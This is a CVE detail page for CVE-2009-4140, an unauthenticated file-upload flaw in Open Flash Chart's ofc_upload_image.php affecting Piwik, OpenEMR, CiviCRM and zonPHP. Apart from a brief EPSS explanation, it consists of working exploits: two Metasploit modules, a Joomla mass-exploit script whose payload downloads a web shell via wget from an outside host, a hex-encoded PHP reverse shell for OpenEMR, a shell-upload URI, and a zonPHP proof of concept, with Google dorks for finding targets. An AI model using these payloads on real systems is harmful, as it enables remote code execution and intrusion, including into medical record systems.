CVE-2009-4140 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Open Flash Chart v2 Arbitrary File Upload", 'Description' => %q{ This module exploits a file upload vulnerability found in Open Flash Chart version 2. Attackers can abuse the 'ofc_upload_image.php' file in order to upload and execute malicious PHP files. }, 'License' => MSF_LICENSE, 'Author' => [ 'Braeden Thomas', # Initial discovery + Piwik PoC 'Gjoko Krstic <gjoko[at]zeroscience.mk>', # OpenEMR PoC 'Halim Cruzito', # zonPHP PoC 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit ], 'References' => [ ['BID', '37314'], ['CVE', '2009-4140'], ['OSVDB', '59051'], ['EDB', '10532'] ], 'Payload' => { 'Space' => 8190, # Just a big value, injection on HTTP POST 'DisableNops' => true, 'BadChars' => "\x00" }, 'Arch' => ARCH_PHP, 'Platform' => 'php', 'Targets' => [ # Tested on: # * open-flash-chart v2-Lug-Wyrm-Charmer # set TARGETURI /php-ofc-library/ # * open-flash-chart v2-beta-1 # set TARGETURI /php-ofc-library/ # * zonPHP v2.25 # set TARGETURI /zonPHPv225/ofc/ # * Piwik v0.4.3 # set TARGETURI /piwik/libs/open-flash-chart/php-ofc-library/ # * OpenEMR v4.1.1 # set TARGETURI /openemr-4.1.1/library/openflashchart/php-ofc-library/ [ 'Generic (PHP Payload)', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Dec 14 2009', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Open Flash Chart', '/php-ofc-library/']) ], self.class) end # # Check for ofc_upload_image.php # def check print_status("#{peer} - Sending check") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "ofc_upload_image.php"), }) if not res print_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown elsif res.code.to_i == 404 print_error("#{peer} - No ofc_upload_image.php found") elsif res and res.code == 200 and res.body =~ /Saving your image to/ vprint_status("#{peer} - Found ofc_upload_image.php") return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit # Upload @fname = "#{rand_text_alphanumeric(rand(10)+6)}.php" print_status("#{peer} - Uploading '#{@fname}' (#{payload.encoded.length} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'ofc_upload_image.php'), 'ctype' => "", 'vars_get' => { 'name' => "#{@fname}" }, 'data' => "<?php #{payload.encoded} ?>" }) if not res fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading") elsif res.code.to_i == 404 fail_with(Failure::NotFound, "#{peer} - No ofc_upload_image.php found") elsif res.body =~ /can't write file/ fail_with(Failure::Unknown, "#{peer} - Unable to write '#{@fname}'") elsif res.body =~ /Saving your image to: (.+)#{@fname}/ path = $1 register_files_for_cleanup(@fname) print_status("#{peer} - Executing '#{path}#{@fname}'") else fail_with(Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!") end # Execute res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, path, @fname) }) if res and res.code == 404 fail_with(Failure::NotFound, "#{peer} - Not found: #{@fname}") end end end # # Source # =begin ofc_upload_image.php 20-// default path for the image to be stored // 21-$default_path = '../tmp-upload-images/'; 23-if (!file_exists($default_path)) mkdir($default_path, 0777, true); 25-// full path to the saved image including filename // 26-$destination = $default_path . basename( $_GET[ 'name' ] ); 28-echo 'Saving your image to: '. $destination; 39-$jfh = fopen($destination, 'w') or die("can't open file"); 40-fwrite($jfh, $HTTP_RAW_POST_DATA); 41-fclose($jfh); =end

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "OpenEMR PHP File Upload Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the ofc_upload_image.php file from the openflashchart library, a malicious user can upload a file to the tmp-upload-images directory without any authentication, which results in arbitrary code execution. The module has been tested successfully on OpenEMR 4.1.1 over Ubuntu 10.04. }, 'License' => MSF_LICENSE, 'Author' => [ 'Gjoko Krstic <gjoko[at]zeroscience.mk>', # Discovery, PoC 'juan vazquez' # Metasploit module ], 'References' => [ [ 'OSVDB', '90222' ], [ 'BID', '37314' ], [ 'EBD', '24492' ], [ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ], [ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ] ], 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [ ['OpenEMR 4.1.1', {}] ], 'Privileged' => false, 'DisclosureDate' => "Feb 13 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to EGallery', '/openemr']) ], self.class) end def check uri = target_uri.path peer = "#{rhost}:#{rport}" # Check version print_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "interface", "login", "login.php") }) if res and res.code == 200 and res.body =~ /v(\d\.\d\.\d)/ version = $1 else return Exploit::CheckCode::Unknown end print_status("#{peer} - Version #{version} detected") if version > "4.1.1" return Exploit::CheckCode::Safe end # Check for vulnerable component print_status("#{peer} - Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php"), }) if res and res.code == 200 and res.body =~ /Saving your image to/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit uri = target_uri.path peer = "#{rhost}:#{rport}" payload_name = rand_text_alpha(rand(10) + 5) + '.php' my_payload = payload.encoded print_status("#{peer} - Sending PHP payload (#{payload_name})") res = send_request_raw({ 'method' => 'POST', 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}", 'headers' => { "Content-Length" => my_payload.length.to_s }, 'data' => my_payload }) # If the server returns 200 and the body contains our payload name, # we assume we uploaded the malicious file successfully if not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/ fail_with(Exploit::Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!") end register_file_for_cleanup(payload_name) print_status("#{peer} - Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "tmp-upload-images", payload_name), }) # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 print_error("#{peer} - Server returned #{res.code.to_s}") end end end

# Exploit Title: joomla component com_civicrm remode code injection exploit # Google Dork:"Index of /joomla/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart" # Date: 20/04/2013 # Exploit Author: iskorpitx # Vendor Homepage: http://civicrm.org # Software Link: http://civicrm.org/blogs/yashodha/announcing-civicrm-422 # Version: [civicrm 4.2.2] # Tested on: Win8 Pro x64 # CVE : http://www.securityweb.org <?php # Joomla component com_civicrm OpenFlashCart ofc_upload_image.php remote code injection exploit # http://www.securityweb.org & http://www.security.biz.tr # multithreading mass c:\appserv\www>exp.php -u http://target.com/ -f post.php $options = getopt('u:f:'); if(!isset($options['u'], $options['f'])) die("\n Usage example: php jnews.php -u http://target.com/ -f post.php\n -u http://target.com/ The full path to Joomla! -f post.php The name of the file to create.\n"); $url = $options['u']; $file = $options['f']; $shell = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/{$file}"; $url = "{$url}administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name={$file}"; $data = '<?php system("wget http://www.securityweb.org/shell.txt; mv shell.txt post.php"); system("cp post.php ../../../../../../../tmp/post.php"); system("cd ..; rm -rf tmp-upload-images"); echo "by iskorpitx" ; fclose ( $handle ); ?>'; $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'Content-Type: text/plain'); echo " [+] Submitting request to: {$options['u']}\n"; $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $url); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_POSTFIELDS, $data); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $source = curl_exec($handle); curl_close($handle); if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) { echo " [+] Exploit completed successfully!\n"; echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n"; } else { die(" [+] Exploit was unsuccessful.\n"); } ?>

<?php /* OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability Vendor: OpenEMR Product web page: http://www.open-emr.org Affected version: 4.1.1 Summary: OpenEMR is a Free and Open Source electronic health records and medical practice management application that can run on Windows, Linux, Mac OS X, and many other platforms. Desc: The vulnerability is caused due to the improper verification of uploaded files in '/library/openflashchart/php-ofc-library/ofc_upload_image.php' script thru the 'name' parameter. This can be exploited to execute arbitrary PHP code by uploading a malicious PHP script with multiple extensions. ================================================================================ /library/openflashchart/php-ofc-library/ofc_upload_image.php: ------------------------------------------------------------- 21: $default_path = '../tmp-upload-images/'; 23: if (!file_exists($default_path)) mkdir($default_path, 0777, true); 26: $destination = $default_path . basename( $_GET[ 'name' ] ); 28: echo 'Saving your image to: '. $destination; 39: $jfh = fopen($destination, 'w') or die("can't open file"); 40: fwrite($jfh, $HTTP_RAW_POST_DATA); 41: fclose($jfh); 46: exit(); ================================================================================ Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Fedora Linux Apache2, PHP 5.4 MySQL 5.5 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5126 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php 09.02.2013 */ error_reporting(0); set_time_limit(0); $go = "\033[0;92m"; $no = "\033[0;37m"; echo $no; $host = $argv[1]; $sock = fsockopen($host, 80, $errno, $errstr, 30); if(!$sock) { echo "\n> $errstr ($errno)\n"; die(); } function r_shell($sc) { for($z = 0; $z < strlen($sc); $z += 2) $exec .= chr(hexdec(substr($sc,$z,2))); return $exec; } print "\n+--------------------------------------------------------+"; print "\n+ +"; print "\n+ OpenEMR 4.1.1 Remote Reverse Shell Exploit (pre-auth) +"; print "\n+ +"; print "\n+ ID: ZSL-2013-5126 +"; print "\n+ +"; print "\n+ Copyleft (c) 2013, Zero Science Lab +"; print "\n+ +"; print "\n+--------------------------------------------------------+\n\n"; // PoC for Linux // Before running this script, listen on 127.0.0.1: nc -vv -n -l -p 1234 if ($argc < 2) { print "\n> Usage: php $argv[0] <target>\n\n"; die(); } $pl = r_shell("3c3f7068700d0a". "7365745f74696d". "655f6c696d6974". "202830293b0d0a". "246970203d2027". "3132372e302e30". "2e31273b0d0a24". "706f7274203d20". "313233343b0d0a". "246368756e6b5f". "73697a65203d20". "313430303b0d0a". "2477726974655f". "61203d206e756c". "6c3b2024657272". "6f725f61203d20". "6e756c6c3b0d0a". "247368656c6c20". "3d2027756e616d". "65202d613b2077". "3b2069643b202f". "62696e2f736820". "2d69273b0d0a24". "6461656d6f6e20". "3d20303b202464". "65627567203d20". "303b0d0a696620". "2866756e637469". "6f6e5f65786973". "7473282770636e". "746c5f666f726b". "272929207b0d0a". "24706964203d20". "70636e746c5f66". "6f726b28293b0d". "0a696620282470". "6964203d3d202d". "3129207b0d0a70". "72696e74697428". "224552524f523a". "2043616e277420". "666f726b22293b". "20657869742831". "293b7d0d0a6966". "20282470696429". "207b6578697428". "30293b7d0d0a69". "662028706f7369". "785f7365747369". "642829203d3d20". "2d3129207b0d0a". "7072696e746974". "28224572726f72". "3a2043616e2774". "20736574736964". "282922293b2065". "7869742831293b". "7d0d0a24646165". "6d6f6e203d2031". "3b7d20656c7365". "207b0d0a707269". "6e746974282257". "41524e494e473a". "204661696c6564". "20746f20646165". "6d6f6e6973652e". "20205468697320". "69732071756974". "6520636f6d6d6f". "6e20616e64206e". "6f742066617461". "6c2e22293b7d0d". "0a636864697228". "222f22293b2075". "6d61736b283029". "3b0d0a24736f63". "6b203d2066736f". "636b6f70656e28". "2469702c202470". "6f72742c202465". "72726e6f2c2024". "6572727374722c". "203330293b0d0a". "69662028212473". "6f636b29207b0d". "0a7072696e7469". "74282224657272". "73747220282465". "72726e6f292229". "3b206578697428". "31293b7d0d0a24". "64657363726970746f7273706563203d206172726179280d0a30203d3e206172726179282270". "697065222c20227222292c0d0a31203d3e206172726179282270697065222c20227722292c0d". "0a32203d3e206172726179282270697065222c2022772229293b0d0a2470726f63657373203d". "2070726f635f6f70656e28247368656c6c2c202464657363726970746f72737065632c202470". "69706573293b0d0a696620282169735f7265736f75726365282470726f636573732929207b0d". "0a7072696e74697428224552524f523a2043616e277420737061776e207368656c6c22293b0d". "0a657869742831293b7d0d0a73747265616d5f7365745f626c6f636b696e6728247069706573". "5b305d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b31". "5d2c2030293b0d0a73747265616d5f7365745f626c6f636b696e67282470697065735b325d2c". "2030293b0d0a73747265616d5f7365745f626c6f636b696e672824736f636b2c2030293b0d0a". "7072696e74697428225375636365737366756c6c79206f70656e656420726576657273652073". "68656c6c20746f202469703a24706f727422293b0d0a7768696c6520283129207b0d0a696620". "2866656f662824736f636b2929207b0d0a7072696e74697428224552524f523a205368656c6c". "20636f6e6e656374696f6e207465726d696e6174656422293b20627265616b3b7d0d0a696620". "2866656f66282470697065735b315d2929207b0d0a7072696e74697428224552524f523a2053". "68656c6c2070726f63657373207465726d696e6174656422293b20627265616b3b7d0d0a2472". "6561645f61203d2061727261792824736f636b2c202470697065735b315d2c20247069706573". "5b325d293b0d0a246e756d5f6368616e6765645f736f636b657473203d2073747265616d5f73". "656c6563742824726561645f612c202477726974655f612c20246572726f725f612c206e756c". "6c293b0d0a69662028696e5f61727261792824736f636b2c2024726561645f612929207b0d0a". "6966202824646562756729207072696e7469742822534f434b205245414422293b0d0a24696e". "707574203d2066726561642824736f636b2c20246368756e6b5f73697a65293b0d0a69662028". "24646562756729207072696e7469742822534f434b3a2024696e70757422293b0d0a66777269". "7465282470697065735b305d2c2024696e707574293b7d0d0a69662028696e5f617272617928". "2470697065735b315d2c2024726561645f612929207b0d0a6966202824646562756729207072". "696e74697428225354444f5554205245414422293b0d0a24696e707574203d20667265616428". "2470697065735b315d2c20246368756e6b5f73697a65293b0d0a696620282464656275672920". "7072696e74697428225354444f55543a2024696e70757422293b0d0a6677726974652824736f". "636b2c2024696e707574293b7d0d0a69662028696e5f6172726179282470697065735b325d2c". "2024726561645f612929207b0d0a6966202824646562756729207072696e7469742822535444". "455252205245414422293b0d0a24696e707574203d206672656164282470697065735b325d2c". "20246368756e6b5f73697a65293b0d0a6966202824646562756729207072696e746974282253". "54444552523a2024696e70757422293b0d0a6677726974652824736f636b2c2024696e707574". "293b7d7d0d0a66636c6f73652824736f636b293b0d0a66636c6f7365282470697065735b305d". "293b0d0a66636c6f7365282470697065735b315d293b0d0a66636c6f7365282470697065735b". "325d293b0d0a70726f635f636c6f7365282470726f63657373293b0d0a66756e6374696f6e20". "7072696e746974202824737472696e6729207b0d0a6966202821246461656d6f6e29207b2070". "72696e74202224737472696e675c6e223b7d7d0d0a3f3e"); //PHP Reverse Shell, PTMNKY. echo "\n> Writing reverse shell file"; $pckt = "POST /openemr/library/openflashchart/php-ofc-library/ofc_upload_image.php?name=joxypoxy.php HTTP/1.1\r\n"; $pckt .= "Host: {$host}\r\n"; $pckt .= "Content-Length: ".strlen($pl)."\r\n\r\n{$pl}"; fputs($sock, $pckt); sleep (2); print " ...."; echo $go."[OK]"; echo $no; echo "\n> Calling your listener"; $pckt = "GET /openemr/library/openflashchart/tmp-upload-images/joxypoxy.php HTTP/1.0\r\n"; $pckt .= "Host: {$host}\r\n"; $pckt .= "Connection: Keep-Alive\r\n\r\n"; fputs($sock, $pckt); sleep (2); print " ........."; echo $go."[OK]"; echo $no."\n"; // interact_sh(); echo "\n> Enjoy!\n\n"; ?>

Bugtraq ID: 37314 Class: Input Validation Error CVE: Remote: Yes Local: No Published: Dec 14 2009 12:00AM Updated: Dec 17 2009 06:03PM Credit: Braeden Thomas Vulnerable: Piwik Piwik 0.4.3 Piwik Piwik 0.4.2 Piwik Piwik 0.4.1 Piwik Piwik 0.4 Piwik Piwik 0.2.37 Piwik Piwik 0.2.36 Piwik Piwik 0.2.35 Open Web Analytics Open Web Analytics 1.2.0 Open Flash Chart Open Flash Chart 2.0 Open Flash Chart is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input. Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process. Open Flash Chart 2 Beta 1 and Open Flash Chart 2 are vulnerable; other versions may also be affected. The following example URI is available: http://server/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>

# Exploit Title: ZonPHP V2.25 RCE Vulnerability # Google Dork: intext:"Made by SLAPER" # Date: 21-10-2013 # Exploit Author: Halim Cruzito # Vendor Homepage: http://www.slaper.be # Software Link: http://www.slaper.be/zonPHPv225.zip # Version: v2.25 # Tested on: Windows 7 # PoC: <?php $url = "http://server/"; $path = "ofc/ofc_upload_image.php?name="; $filename = "up.php"; $data = "<?php phpinfo(); ?>"; $headers = array("User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0",� "Content-Type: text/plain"); $rc = curl_init(); curl_setopt($rc, CURLOPT_URL, $url.$path.$filename); curl_setopt($rc, CURLOPT_HTTPHEADER, $headers); curl_setopt($rc, CURLOPT_POST, 1); curl_setopt( $rc, CURLOPT_SSL_VERIFYPEER, 1); curl_setopt($rc, CURLOPT_POSTFIELDS, $data); curl_setopt($rc, CURLOPT_RETURNTRANSFER, 1); $ex = curl_exec($rc); curl_close($rc);� $shelllink = ''.$url.''.$filename.''; echo '<a href="'.$shelllink.'" target="blank">Exploited Click Here!</a>'; ?> �=============================================== |Loveto:Karoxx Puyoo ^^ and all Malaysian HaXor | �===============================================